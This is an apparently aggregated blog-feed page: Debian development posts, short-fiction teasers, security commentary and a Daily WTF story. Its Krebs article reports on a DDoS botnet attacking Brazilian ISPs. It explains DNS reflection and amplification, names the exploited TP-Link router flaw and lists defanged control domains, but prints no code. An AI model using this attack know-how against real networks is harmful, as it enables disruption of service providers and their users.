The killer feature, for me, has always been the failing-test loop. When a big test suite breaks, you don’t want to re-run the whole thing after every fix — you want to iterate on just the failures, and only re-run the full suite once they’re all green. testrepository made that workflow ergonomic long before most language-specific test runners had anything comparable, and many of them still don’t have a good answer for it.

testrepository has served me well for over a decade, but it has been largely unmaintained for a while, and I had some ideas of improvements that I wanted to try out. So I wrote a Rust port, which has since grown a number of features of its own.

Inquest

Inquest is a Rust port of testrepository that has since grown a number of features of its own. The binary is called inq.

Goals

The goals are deliberately modest:

  • a single static binary, no Python runtime required
  • no need to write a dedicated config file for most projects
  • compatible enough with testrepository’s workflow that I can switch projects over without retraining my fingers
  • a richer on-disk format that captures more about each run (git commit, command line, duration, exit code, concurrency)
  • good support for the languages I actually use day-to-day: Rust, Python, Go, and Node.js
  • mostly Do What I Mean (DWIM), e.g. getting me to know as quickly as possible what tests are failing and why, and being clever about doing this

Inquest reads and writes subunit v2 streams, so anything that can produce subunit (directly or via one of the many converters) can feed into it.

Quick start

Inquest can usually figure out how to run your tests on its own. In a Rust, Python, Go or Node.js project:

 $ cd my-project
 $ inq

Or if the auto-detection doesn’t work, you can ask it to generate a config file and then run the tests:

 $ inq auto
 $ inq run

inq auto writes an inquest.toml describing how to invoke the test runner; inq run runs the tests, captures the subunit stream, and stores the results in a .inquest/ directory.

For a Rust project the generated config looks like:

 test_command = "cargo subunit $IDOPTION"
 test_id_option = "--test $IDFILE"
 test_list_option = "--list"

After the first run, the usual queries work:

 $ inq stats             # repository-wide statistics
 $ inq last              # results of the most recent run
 $ inq failing           # only the failing tests
 $ inq slowest           # the slowest tests in the last run
 $ inq run --failing     # re-run only what failed last time

The last one is the workflow I use most often: run the full suite once, fix the obvious failures, then iterate on inq run --failing until the list is empty.

A few things that aren’t in testrepository

Some of the features that have grown in inquest beyond the original testrepository functionality:

  • Timeouts. --test-timeout, --max-duration, and --no-output-timeout will kill a test process that is hanging or has stopped producing output. --test-timeout auto derives a per-test timeout from the historical duration of that test, which is handy for catching tests that hang.

    Once the test runner is killed, the test is marked as failed and the next test is started, so a broken test doesn’t hold up the whole suite.

  • Ordering --order can be used to run tests in a specific order, e.g. to run the slowest tests first, to run the tests that failed most recently first, or to run the widest variety of tests first to maximize the chance of finding a failure early on.

  • Live progress. inq running tails the in-progress subunit stream on disk and reports observed/expected test counts, percent complete, elapsed wall-clock time, and an ETA derived from each test’s historical duration. Useful when a CI run is taking longer than you’d like.

  • Flakiness ranking. inq flaky ranks tests by pass↔fail transitions in consecutive runs in which the test was recorded, so chronically broken tests rank low and genuinely flapping tests rank high.

  • Comparing runs. inq diff <A> <B> shows what changed between two test runs — newly failing, newly passing, and tests that flipped state — which makes it easy to see whether your last change actually fixed (or broke) anything.

  • Bisecting git history. inq bisect <TEST> drives git bisect to find the commit that broke a given test. It defaults the known-good and known-bad commits from the recorded run history (the most recent run where the test passed, and the most recent where it failed), so in the common case there is no need to remember either — just point it at the test name and let it work.

  • Richer run metadata. inq info shows the git commit, command line, duration, exit code, and concurrency for a run, with a flag for whether the working tree was dirty when the run started. Combined with inq diff this makes it much easier to triangulate when a regression was introduced.

  • Rerun a previous run verbatim. inq rerun <ID> re-runs exactly the tests of a previous run, in the same order, forwarding the same -- arguments that the original run used. inq rerun -1 repeats the latest.

  • Web based view. inq web serves a web-based view of the repository, with a dashboard of recent runs and detailed views of individual runs and tests.

Web UI

Most of the time I drive inquest from the command line, but for browsing historical results of a large suite — spotting flapping tests, drilling into a single test’s run history, or just getting a visual sense of which parts of the suite are hurting — a web view is more pleasant. inq web starts a local server with exactly that:

 $ inq web

The repository overview shows totals and a per-test history grid where each cell is one run, coloured by outcome. Bands of red make it easy to pick out tests that have been broken for a long time, and isolated red cells in an otherwise green column point at flaky tests.

Inquest web UI repository overview, with a grid of per-run results

Drilling into an individual test gives you its full run history, a duration sparkline, and per-run pass/fail status:

Inquest web UI per-test view with run history and duration sparkline

Migrating from testrepository

If you already have a .testrepository/ directory full of historical runs, inq upgrade will migrate it into the new .inquest/ format, with a progress bar for the impatient.

The legacy .testr.conf (INI) format is still understood, so existing projects don’t have to be converted to inquest.toml immediately — though the TOML format is preferred for new projects.

Trying it

The source is on GitHub at jelmer/inquest. To install from source:

 $ cargo install inquest

In a project with a Rust, Python, Go or Node.js test suite:

 $ inq

Bug reports and patches are welcome.

Planet DebianBirger Schacht: Status update, February - April 2026

Due to health reasons I did not have the energy to write individual status updates for February & March, so I’ll just combine them with the April update:

In February I cleaned out my GitHub account and moved all remaining projects to Codeberg. I archived the repositories on GitHub and added links to the new repositories on Codeberg. GitHub is a platform that is more and more frustrating to use. I still have to use it for my dayjob, though. The number of pull requests and issues that are written either by bots or by users that use bots increased in the last two years. Combined with that, GitHub provides a very low barrier for entitled users who do not want to contribute to a productive environment. GitHub now feels like the Twitter/X of git forges. Codeberg on the other hand is a community project. I feel a lot more at home there and the platform itself feels a lot more responsive than GitHub.

Debian Related Work

  • Uploaded wayback 0.3-1 to experimental
  • Uploaded slurp 1.6.0-1 to unstable
  • Uploaded first a prerelease of sway to experimental to be able to test wlroots 0.20.0 and then uploaded rc1, rc2 and rc3 of the upcoming 1.12 release
  • Uploaded waybar 0.15.0-1 to unstable
  • Uploaded kanshi 1.9.0-1 to unstable, which was possible because the dependency libscfg finally went through NEW
  • Uploaded libscfg 0.2.0-1 to unstable
  • Uploaded swaybg 1.2.2-1 to unstable
  • Uploaded labwc 0.9.4-1, 0.9.5 & 0.9.6 to unstable
  • Fixed the packaging of vali and uploaded version 0.1.1-1 to unstable; then added vali to the build dependencies of kanshi and reuploaded 1.9.0-2 thereof
  • Uploaded swaylock 1.8.5-1 to unstable
  • Uploaded fcft 3.3.3-1 to unstable
  • Uploaded foot 1.26.1-1 to unstable
  • Uploaded swayimg 5.0-1 and 5.1-1 to unstable
  • Fixed some packaging metadata in libsfdo and uploaded 0.1.4-2 to unstable
  • Reverted the upload of slurp from 1.6.0-1 to 1.6.0really1.5.0-1 because the upstream release of 1.6.0 was made by mistake and yanked a week later. Maybe I should add a cooldown period before uploading new releases ;)
  • Uploaded mako-notifier 1.11.0-1 to unstable
  • Uploaded cage 0.3.0-1 to experimental which uses wlroots 0.20.0
  • Uploaded xdg-desktop-portal-wlr 0.8.2-1 to unstable
  • Voted

DH Related Work

I took part in the DHD 2026 Conference in Vienna, including a hands-on workshop of the dhinfra project.

I released 0.60.0, 0.61.0 and 0.62.0 of apis-core-rdf. We rewrote the configuration format for the importer. We previously used TOML files, but that does not give us inheritance. So we now use simply Python classes as configuration format.

I implemented a new backend for our apis-bibsonomy Django package. The package is meant to provide a datamodel for storing reference data that links to Bibsonomy or Zotero. Given that we don’t use Bibsonomy anymore we now dropped the Bibsonomy backend but added a Zotero backend that allows to cache the entries locally.

365 TomorrowsThe Ghostwriter

Author: Hugh J. O’Donnell I woke up in a hospital room that smelled like bleach and bad coffee. There was a woman sitting at the foot of my bed. Emma, my agent. But something seemed not quite right. “What happened?” I managed. Emma stood and came closer. She looked terrible. “You were in a car […]

The post The Ghostwriter appeared first on 365tomorrows.

,

Planet DebianBits from Debian: Debian welcomes the 2026 GSoC interns

GSoC logo

We are very excited to announce that Debian has been assigned seven contributors to work under mentorship on a variety of projects with us during the Google Summer of Code.

Here is a list of the projects and contributors, along with details of the tasks to be performed.


Project: Automated Debian Packaging with debianize

  • Contributor: Anurag Nayak

Deliverables of the project: Debianize is a tool that aims to automatically create debian packages from scratch from upstream source trees. As for the current version, it works for some of the packages but it is not reliable. This project aims at making it production ready such that it can work with most of the projects. Along with that improving its reliability, coverage, integration with the broader ecosystem and other enhancements.


Project: Linux Livepatching

  • Contributor: Aryan Karamtoth

Deliverables of the project: Linux Kernel Livepatching is the process of replacing functions in the kernel code affected by CVEs with the patch-applied functions during system runtime. It's basically a method to apply security kernel patches to a running system.


Project: DebNet: Visualising the Bus Factor – Graph Analysis of Debian's Infrastructure

  • Contributor: Fabio Ruhland

Deliverables of the project: DebNet models the Debian archive as a graph to identify critical packages maintained by too few people. Using data from the Ultimate Debian Database (UDD), it builds a package dependency graph and a maintainer-package graph to compute practical metrics like the Bus Factor, Fragility Score, and Dependency Impact for every source package.


Project: Attack of the Clones: Fight Back Using Code Duplication Detection From Security Patches

  • Contributor: Gajendra Nath Soren

Deliverables of the project: This project aims to detect vulnerable code clones in the Debian archive by automatically extracting signatures from security patches. Using a two-signal approach that separates vulnerable patterns from fix patterns, the system generates high-specificity queries to search the entire archive via Debian CodeSearch.


Project: Debusine: debuginfod server

  • Contributor: Jugal59

Deliverables of the project: This project implements a debuginfod-compatible server within Debusine to provide automated debug symbol resolution for Debian developers.


Project: Debian-LSP: Improve File Format Support

  • Contributor: Lucas Ly Ba

Deliverables of the project: The Debian LSP Language Server currently provides only basic features—field completion, parse-error diagnostics, and simple quick fixes—leaving Debian maintainers without the rich IDE experience available in other ecosystems.


Project: Debusine: live log streaming

  • Contributor: mo-ashraf

Deliverables of the project: Debusine currently only shows task logs after a task has fully completed. This means developers working with long-running jobs (such as package builds or test pipelines) have no way to monitor progress in real time or catch failures early. This project adds live log streaming to Debusine.


Congratulations and welcome to all the contributors!

The Google Summer of Code program is possible in Debian thanks to the efforts of Debian Developers and Debian Contributors that dedicate part of their free time to mentor contributors and outreach tasks.

Join us and help extend Debian! You can follow the contributors' weekly reports on the debian-outreach mailing-list, chat with us on our IRC channel or reach out to the individual projects' team mailing lists.

Planet DebianBen Hutchings: FOSS activity in April 2026

365 TomorrowsThe Big Picture

Author: James Gonda At the hotel in West Texas, a low structure with a lobby that smells of citrus and air conditioning, I unpack my bag: one pair of walking shoes (the soles caked with dust from Jordan), three dress shirts, a pack of almonds, and a paperback, its bookmark a receipt from the Reykjavík […]

The post The Big Picture appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: binb 0.0.8 on CRAN: Maintenance

The eight release of the binb package, and first in two years, is now on CRAN and in r2u. binb regroups four rather nice themes for writing LaTeX Beamer presentations much more easily in (R)Markdown. As a teaser, a quick demo combining all four themes is available; documentation and examples are in the package.

This release contains regular internal updates to continuous integration, URLs reference and switch to Authors@R. The trigger for the release, though, was a small updated need when very recent pandoc versions (as shipped with RStudio) are used which require a new variable declaration in the LaTeX template files in order to process uncaptioned tables. The summary of changes follows.

Changes in binb version 0.0.8 (2026-05-01)

  • Small updates to documentation URLs and continuous integration

  • The package now uses Authors@R in DESCRIPTION

  • Newer pandoc versions are accommodated by adding a required counter variable in the latex template file

CRANberries provides a summary of changes to the previous version. For questions or comments, please use the issue tracker at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Cryptogram A Ransomware Negotiator Was Working for a Ransomware Gang

Someone pleaded guilty to secretly working for a ransomware gang as he negotiated ransomware payments for clients.

365 TomorrowsSubmerged Worlds

Author: Zoe Lin Pal 100 years ago, the world was lost to the sea. Glaciers, once frozen in time, collapsed into rising tides, swallowing cities whole. Only a fraction of humanity remains, building lives on the edges of what the water has spared. The ocean took everything. And still, it kept secrets. – – – […]

The post Submerged Worlds appeared first on 365tomorrows.

Worse Than FailureError'd: Parametric Projection

Roger C. gets on second base with an unforced error. "Not only is the content too large, the error message informing us of this is also too large to fit the visible space. A layered, double WTF."

782b1790d9d549d6a8acf4045669d7a6

"AWS Spellcheck Fail!" alerts Peter "If only someone at AWS knew the correct paramters to activate the spellcheck."

ee85e87fd7cb4cc2ac3038cb9f97ccf8

"How long is too long for a job to be open? " wonders Lincoln K. "I didn't even know LinkedIn existed 61 years ago, let alone was accepting postings... Though only 81 applicants in that time is hardly an impressive turn-out." For a "Vice President Operations and Quality Control", no less.

1c3d4b06a37e4119b62dc39bad29b9a3

An anonymous Richard reports "This came through my door. On a card that, in order to get to my door, had my full address printed on it, including my ."

9df5e07d210846f08dc925105f19b64b

Oenophile Abroad Michael R. shares "My Macbook broke after being "exposed" to red wine. As a German in London it pleases me so see that the repair shop offers this time granularity."

a9f634b888de4927babb91d7d2920579

[Advertisement] Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.

Planet DebianReproducible Builds (diffoscope): diffoscope 318 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 318. This version includes the following changes:

[ Chris Lamb ]
* Upload to test PyPI integration.
* Bump Standards-Version to 4.7.4.

[ Manuel Jacob ]
* Remove a misleading comment.

You find out more by visiting the project homepage.

,

Planet DebianSergio Cipriano: My experience at MiniDebConf Campinas 2026

My experience at MiniDebConf Campinas 2026

Last week, I spent the entire week in Campinas attending MiniDebConf and MiniDebCamp. The Debian Brazil community organizes this event every year, and this year's edition was the biggest so far.

During MiniDebCamp, I sponsored a few uploads and spent two days teaching packaging to two participants. I usually teach packaging online, so it was refreshing to do it in person. I believe the experience was much better than teaching online.

One of my mentees introduced me to the DDTSS (Debian Distributed Translation Server Satellite). Even though there are many i18n contributors in Brazil, this was my first time learning about this system. I plan to contribute to translations over the next few weeks using DDTSS.

My Activities

NOTE: I translated every talk title; the original titles are in PT-BR, so some details may have been lost in translation.

I presented three talks and led one BoF session. The talks are all available on Debian's Peertube:

You can also find my slides at people.d.o.

My first talk was a showcase of dh-make-vim, a tool I created and have been using for a few months. Some people tested it and found bugs, which was really nice to see.

My second talk was essentially a live version of my blog post Zero-Code Instrumentation of an Envoy TCP Proxy using eBPF.

I also gave a lightning talk about something many people are not aware of: non-uploading DDs can also sponsor uploads.

If you're interested, this bug report provides more context: tracker.debian.org: Signed by field is missing when sponsoring as DD non-uploading

Finally, I led the BoF session "Experiences, lessons learned, and next steps from the mentoring sessions". This was my favorite session, we had many participants with different perspectives and ideas, which led to a very engaging discussion. I'm still working on the action plans and I plan to release them soon.

Here are some photos of these activities:

Mentorship BoF

Mentorship BoF

DD non-uploading can upload talk

dh-make-vim showcase

Zero-Code Instrumentation showcase

My favorite activities

This is a list, in no particular order, of some of the sessions I enjoyed the most:

  • Salsa CI, showing features that almost nobody knows

    I wrote a blog post about one of the things I learned in this talk, and there is still a lot more to explore. Aquila Macedo is developing many cool features in Salsa CI.

  • Free Software: Freedom, Autonomy, Sovereignty

    I had been really looking forward to this one. Alexandre Oliva is a very important figure in the Free Software movement, especially in South America. I'll need to rewatch it, my futures talks about Free Software will likely be inspired by this one.

  • What I've lived/seen in 33 Years of Debian & Free Software in general

    Eduardo Maçan was the first Debian Developer in Brazil, so it's always valuable to hear the story from someone who was part of it.

  • Symbolism - an introduction

    Despite the title, this talk was not about astrology! I'll probably rewatch it as well, as there is a lot of information to take in. I really like the passion Sérgio Durigan has for C. He is also a great speaker and knows how to guide the audience through the topic.

  • Debate: Contemporary controversies in Debian

    The debate itself was great, but the conversations we had afterward were even better. I changed some of my opinions after hearing different perspectives. I don't think this format would work at DebConf, but I would definitely like to attend another one like this.

  • Why LTS on Debian?

    I had a few questions about LTS, and Kanashiro and Santiago answered them both during the talk and in the Q&A session. They also shared some challenges and how to avoid them, it was a great learning experience.

  • From my first contribution to the Debian Maintainer

    Polkorny was a bit shy but did a great job! I really enjoy this kind of talk. It is always nice to see the different paths people take.

Unfortunatly, I couldn't attend everything I was interested in, as always.

DayTrip - The Brazilian Particle Accelerator

Sirius is the largest and most complex scientific infrastructure ever built in Brazil and one of the most advanced synchrotron light sources in the world. My jaw dropped the entire time; it's hard to describe how incredible this is.

My favorite detail: they're running Debian :)

Wrap up

I believe this was the best MiniDebConf Brazil so far. There were many other things I chose not to include here, as this post is already quite long. Still, here are a few more highlights:

  • A Bug Squashing Party
  • Driving Samuel Henrique's drones
  • Lots of capybaras
  • A small birthday party
  • A visit to two data centers

Krebs on SecurityAnti-DDoS Firm Heaped Attacks on Brazilian ISPs

A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm’s chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company’s public image.

An Archer AX21 router from TP-Link. Image: tp-link.com.

For the past several years, security experts have tracked a series of massive DDoS attacks originating from Brazil and solely targeting Brazilian ISPs. Until recently, it was less than clear who or what was behind these digital sieges. That changed earlier this month when a trusted source who asked to remain anonymous shared a curious file archive that was exposed in an open directory online.

The exposed archive contained several Portuguese-language malicious programs written in Python. It also included the private SSH authentication keys belonging to the CEO of Huge Networks, a Brazilian ISP that primarily offers DDoS protection to other Brazilian network operators.

Founded in Miami, Fla. in 2014, Huge Networks’s operations are centered in Brazil. The company originated from protecting game servers against DDoS attacks and evolved into an ISP-focused DDoS mitigation provider. It does not appear in any public abuse complaints and is not associated with any known DDoS-for-hire services.

Nevertheless, the exposed archive shows that a Brazil-based threat actor maintained root access to Huge Networks infrastructure and built a powerful DDoS botnet by routinely mass-scanning the Internet for insecure Internet routers and unmanaged domain name system (DNS) servers on the Web that could be enlisted in attacks.

DNS is what allows Internet users to reach websites by typing familiar domain names instead of the associated IP addresses. Ideally, DNS servers only provide answers to machines within a trusted domain. But so-called “DNS reflection” attacks rely on DNS servers that are (mis)configured to accept queries from anywhere on the Web. Attackers can send spoofed DNS queries to these servers so that the request appears to come from the target’s network. That way, when the DNS servers respond, they reply to the spoofed (targeted) address.

By taking advantage of an extension to the DNS protocol that enables large DNS messages, botmasters can dramatically boost the size and impact of a reflection attack — crafting DNS queries so that the responses are much bigger than the requests. For example, an attacker could compose a DNS request of less than 100 bytes, prompting a response that is 60-70 times as large. This amplification effect is especially pronounced when the perpetrators can query many DNS servers with these spoofed requests from tens of thousands of compromised devices simultaneously.

A DNS amplification attack, illustrated. It shows an attacker on the left, sending malicious commands to a number of bots to the immediate right, which then make spoofed DNS queries with the source address as the target's IP address.

A DNS amplification and reflection attack, illustrated. Image: veracara.digicert.com.

The exposed file archive includes a command-line history showing exactly how this attacker built and maintained a powerful botnet by scouring the Internet for TP-Link Archer AX21 routers. Specifically, the botnet seeks out TP-Link devices that remain vulnerable to CVE-2023-1389, an unauthenticated command injection vulnerability that was patched back in April 2023.

Malicious domains in the exposed Python attack scripts included DNS lookups for hikylover[.]st, and c.loyaltyservices[.]lol, both domains that have been flagged in the past year as control servers for an Internet of Things (IoT) botnet powered by a Mirai malware variant.

The leaked archive shows the botmaster coordinated their scanning from a Digital Ocean server that has been flagged for abusive activity hundreds of times in the past year. The Python scripts invoke multiple Internet addresses assigned to Huge Networks that were used to identify targets and execute DDoS campaigns. The attacks were strictly limited to Brazilian IP address ranges, and the scripts show that each selected IP address prefix was attacked for 10-60 seconds with four parallel processes per host before the botnet moved on to the next target.

The archive also shows these malicious Python scripts relied on private SSH keys belonging to Huge Networks’s CEO, Erick Nascimento. Reached for comment about the files, Mr. Nascimento said he did not write the attack programs and that he didn’t realize the extent of the DDoS campaigns until contacted by KrebsOnSecurity.

“We received and notified many Tier 1 upstreams regarding very very large DDoS attacks against small ISPs,” Nascimento said. “We didn’t dig deep enough at the time, and what you sent makes that clear.”

Nascimento said the unauthorized activity is likely related to a digital intrusion first detected in January 2026 that compromised two of the company’s development servers, as well as his personal SSH keys. But he said there’s no evidence those keys were used after January.

“We notified the team in writing the same day, wiped the boxes, and rotated keys,” Nascimento said, sharing a screenshot of a January 11 notification from Digital Ocean. “All documented internally.”

Mr. Nascimento said Huge Networks has since engaged a third-party network forensics firm to investigate further.

“Our working assessment so far is that this all started with a single internal compromise — one pivot point that gave the attacker downstream access to some resources, including a legacy personal droplet of mine,” he wrote.

“The compromise happened through a bastion/jump server that several people had access to,” Nascimento continued. “Digital Ocean flagged the droplet on January 11 — compromised due to a leaked SSH key, in their wording — I was traveling at the time and addressed it on return. That droplet was deprecated and destroyed, and it was never part of Huge Networks infrastructure.”

The malicious software that powers the botnet of TP-Link devices used in the DDoS attacks on Brazilian ISPs is based on Mirai, a malware strain that made its public debut in September 2016 by launching a then record-smashing DDoS attack that kept this website offline for four days. In January 2017, KrebsOnSecurity identified the Mirai authors as the co-owners of a DDoS mitigation firm that was using the botnet to attack gaming servers and scare up new clients.

In May 2025, KrebsOnSecurity was hit by another Mirai-based DDoS that Google called the largest attack it had ever mitigated. That report implicated a 20-something Brazilian man who was running a DDoS mitigation company as well as several DDoS-for-hire services that have since been seized by the FBI.

Nascimento flatly denied being involved in DDoS attacks against Brazilian operators to generate business for his company’s services.

“We don’t run DDoS attacks against Brazilian operators to sell protection,” Nascimento wrote in response to questions. “Our sales model is mostly inbound and through channel integrator, distributors, partners — not active prospecting based on market incidents. The targets in the scripts you received are small regional providers, the vast majority of which are neither in our customer base nor in our commercial pipeline — a fact verifiable through public sources like QRator.”

Nascimento maintains he has “strong evidence stored on the blockchain” that this was all done by a competitor. As for who that competitor might be, the CEO wouldn’t say.

“I would love to share this with you, but it could not be published as it would lose the surprise factor against my dishonest competitor,” he explained. “Coincidentally or not, your contact happened a week before an important event – ​​one that this competitor has NEVER participated in (and it’s a traditional event in the sector). And this year, they will be participating. Strange, isn’t it?”

Strange indeed.

Planet DebianRussell Coker: Links April 2026

Charles Stross wrote an interesting blog post about the apparent desire of super rich people to kill the poor, it seems that the people in power want to make all the conspiracy theories come true [1].

Wouter wrote an insightful blog post about the need for free firmware [2].

Matthew Garrett wrote an interesting blog post about the potential security issues raised by non-free firmware and firmware updates [3]. Which goes well with Wouter’s post.

Interesting article about fake job adverts with a code sample for the applicant to show their skils which depends on hostile libraries that install a RAT [4]. Do we need Qubes for software development nowadays?

Bruce Schneier wrote an insightful and informative article about the two-tiered Internet access scheme in Iran and how it is bad for society [5].

Caleb Hearth gave an interesting talk Don’t Get Distracted about the often ignored unethical uses of software [6].

Techdirt has an insightful article from 2025 Fascism For First Time Founders about why it’s a bad idea for tech companies to support fascism, this aged very well [7].

Dr. Bret C. Devereaux wrote an informative blog post about why fascists always fail at war, and also authoritarians in general [8].

Bruce Schneier and Nathan Sanders wrote an interesting blog post about the new Japanese political party Team Mirai, we need this sort of party in every country to save democracy [9].

Sam Varghese wrote an insightful article about the current situation in Israel and Iran and the poor performance of Australian journalists in covering the issues [10].

Louis Rossman made a video about the Norwegian Consumer Council’s advertising campaign about Enshittification, he includes an excellent advert that the Norwegians produced [11].

Marga Manterola gave a really good talk at Fosdem 2026 “Free as in Burned Out: Who Really Pays for Open Source?” [12].

Cryptogram Fast16 Malware

Researchers have reverse-engineered a piece of malware named Fast16. It’s almost certainly state-sponsored, probably US in origin, and was deployed against Iran years before Stuxnet:

“…the Fast16 malware was designed to carry out the most subtle form of sabotage ever seen in an in-the-wild malware tool: By automatically spreading across networks and then silently manipulating computation processes in certain software applications that perform high-precision mathematical calculations and simulate physical phenomena, Fast16 can alter the results of those programs to cause failures that range from faulty research results to catastrophic damage to real-world equipment.”

Another news article.

Lots of interesting details at the links.

365 TomorrowsNo Salvation in the Dawn

Author: R. J. Erbacher I was lying on a beach, naked under a blanket, having just made love to my wife, and we were gazing at the stars. An intense fireplace of driftwood crackled in a hole scooped out of the sand and the only other sound was the soothing pulse of the waves breaking […]

The post No Salvation in the Dawn appeared first on 365tomorrows.

Worse Than FailureCodeSOD: Cancel Catch

"This WTF is in Matlab" almost feels like cheating. At one place I worked, somebody's job was struggling through a mountain of Matlab code and porting it into C. "This Matlab code looks like it was written by an alien," also doesn't really get much traction- all Matlab code looks like it was written by an alien. This falls into the realm of "Researchers use Matlab, researchers may be very smart about their domain, but generally don't know the first thing about writing maintainable code, because that's not their job."

But let's take a look at some MatLab Carl W found:

    try
        if (~isempty(fieldnames(bigStruct)) && isfield(bigStruct,'pathName'))
            [FileName, PathName] = uigetfile(bigStruct.pathName);
        else
            [FileName, PathName] = uigetfile(lastPath); %lastPath holds previous path
        end
    catch
        bigStruct = struct;
    end

The uigetfile function opens a file dialog box. When the user selects a file, FileName holds the filename, PathName holds the containing path. If the user doesn't select a valid file, or clicks "Cancel", both of those variables get set to 0. It's then up to the caller to check the return value and decide what happens next.

Which is not what happens here, obviously. The developer responsible seems to believe that it maybe throws an exception? And they can just catch it? Carl's best guess is that this is a "weird" way to catch the cancel button. But it does mean that FileName and PathName get set to 0, and those zeros propagate until something finally tries to open those files, at which point everything blows up and the user doesn't know why.

[Advertisement] Plan Your .NET 9 Migration with Confidence
Your journey to .NET 9 is more than just one decision.Avoid migration migraines with the advice in this free guide. Download Free Guide Now!

Planet DebianSergio Cipriano: How to build reverse dependencies using Salsa CI

How to build reverse dependencies using Salsa CI

Last week, I attended MiniDebConf Campinas, and one of my favorites talks was "Salsa CI, showing features that almost nobody knows" by Aquila Macedo.

One of the things I learned is that we can easily build reverse dependencies using:

$ git push -o ci.variable="SALSA_CI_DISABLE_BUILD_REVERSE_DEPENDENCIES=0"

I tried this option before uploading typer version 0.20.0-1:

example of salsa ci build rdeps working

This is an amazing feature. Thanks to everyone involved in making it happen!

Planet DebianOtto Kekäläinen: Mentoring Mondays for aspiring Debian contributors

Featured image of post Mentoring Mondays for aspiring Debian contributors

I mentor several people in Debian, and have been repeatedly asked to offer an opportunity to ask questions on a live call. I have now started a recurring video call for exactly that, which I call Mentoring Mondays, and it is open for anyone aspiring to contribute to Debian, one of the oldest and most widely used Linux distributions.

Mentoring Mondays have already been happening for the past few Mondays, and this week we had a record 20 people on the call. During the calls so far we have had a demo of updating a package for a new upstream release using gbp, and of how to create a Merge Request on Salsa for a new upstream version. There is clearly a need for this, so I am announcing this now also on my blog, just as I have publicly announced that I offer mentoring for aspiring Debian contributors.

What is Mentoring Mondays?

Mentoring Mondays is a recurring video call that lasts roughly 45 minutes with the agenda:

  • Weekly walk-through: demo of something in Debian packaging, explaining the what and why
  • Discussion on pros and cons to help participants develop their judgment
  • Questions & answers on Debian packaging, or open source contributing in general

This is ideal for you if you:

The call is mainly intended for those who want to contribute to Debian (or Debian derivatives, with Ubuntu being the most popular), but anyone can join to learn about things related to contributing to a Linux distribution. Please note that video chat uses Debian Social Jitsi. Joining the call requires authentication using a Salsa account, which anyone contributing to Debian should have anyway.

Calls are not recorded, so participants can chat freely, and are also encouraged to be on-camera for an enhanced sense of community.

Next call: Monday May 4th, 2026

Make sure you are logged into Salsa first, before opening the call on Debian’s Jitsi instance.

Matrix channel and future meeting time announcements

Please join the Matrix channel #mentoringmondays:matrix.debian.social if you plan to attend Mentoring Mondays. All future meeting times will be announced there. It is also the channel to post questions about Debian packaging to be answered during the call.

The current meeting time is friendly to people in Europe, Asia and Australian time zones, and will repeat at the same time slot on:

  • May 11th, 2026 at 12:30 UTC
  • May 18th, 2026 at 12:30 UTC
  • May 25th, 2026 at 12:30 UTC
  • June 1st, 2026 at 12:30 UTC
  • June 8th, 2026 at 12:30 UTC

Starting in mid-June the meeting time will change to accommodate participation in different time zones.

Spread the word

Feel free to extend the invite to anyone you think might be interested in joining!

If you mention this on social media, please post using tag #mentoringmondays, or simply boost the existing posts on the social media of your preference: Mastodon, Lemmy, Reddit, Bluesky, LinkedIn, Farcaster, X.

Thanks

A big thanks to Jason Kregting for helping organize. I would also like to thank in advance all the Debian Developers who are able to join the call and be available to participate in discussions and help answer questions.

,

Cryptogram Claude Mythos Has Found 271 Zero-Days in Firefox

That’s a lot. No, it’s an extraordinary number:

Since February, the Firefox team has been working around the clock using frontier AI models to find and fix latent security vulnerabilities in the browser. We wrote previously about our collaboration with Anthropic to scan Firefox with Opus 4.6, which led to fixes for 22 security-sensitive bugs in Firefox 148.

As part of our continued collaboration with Anthropic, we had the opportunity to apply an early version of Claude Mythos Preview to Firefox. This week’s release of Firefox 150 includes fixes for 271 vulnerabilities identified during this initial evaluation.

As these capabilities reach the hands of more defenders, many other teams are now experiencing the same vertigo we did when the findings first came into focus. For a hardened target, just one such bug would have been red-alert in 2025, and so many at once makes you stop to wonder whether it’s even possible to keep up.

Our experience is a hopeful one for teams who shake off the vertigo and get to work. You may need to reprioritize everything else to bring relentless and single-minded focus to the task, but there is light at the end of the tunnel. We are extremely proud of how our team rose to meet this challenge, and others will too. Our work isn’t finished, but we’ve turned the corner and can glimpse a future much better than just keeping up. Defenders finally have a chance to win, decisively.

They’re right. Assuming the defenders can patch, and push those patches out to users quickly, this technology favors the defenders.

News article.

365 TomorrowsEpic!

Author: Elliott Fielding “I need to think about it.” “But can’t you just pick now? You’re the tiebreaker and we’ve got to decide.” Jene was worried. Making a group decision was stressful; prices changed fast. “Dude, I told you, I need to think about it,” Kol huffed. “Fine. When can you let me know?” “In […]

The post Epic! appeared first on 365tomorrows.

Worse Than FailureA Whale of a Problem

From our Anonymous submitter:

Our company creates graphs to visualize data. We have many small fish customers, but we have one whale who uses our product that is 90% of company revenue. (WTF number 1.)

So if he is not happy, it's all-hands-on deck-mode.

He complained that our APIs and charts are loading slowly for him. For 3 weeks, we've tried a TON of optimizations, including WTF 2: spinning up a special server he alone can hit.

Today, we found out that he's always complaining when he's in his car, driving from home to the office. But since he "totally has the best wifi money can buy," that isn't worth investigating.

WTF 3: thinking wifi and data are always 100% reliable in a car driving around.

Humpback whale breaching in Ballena Marine National Park

Our submitter highlights one of the major pitfalls of the so-called whale client: if they're a bad client, you're in for an extra-bad time.

As I lean harder into freelancing, I'm learning to scan the waters ahead of me for potential whales. My goal is to build up multiple small, diverse income streams, because I've had my own dangerous encounters with whales in the past.

At one employer of mine, there was Facebook, who acted as if they were our new owners rather than a new customer. They'd already produced flashy marketing videos of the sorts of solutions they planned to implement with our software, showing people delighted with the results. In meetings, these things were talked up as amazing game-changers. Meanwhile, I found all the things Facebook wanted to do horribly creepy and invasive.

Even worse, Facebook began dictating how our award-winning technical support should change to accommodate their whims, up to and including having a dedicated toady—er, support rep—who did nothing but field Facebook-related tickets, similar to a technical account manager (TAM).

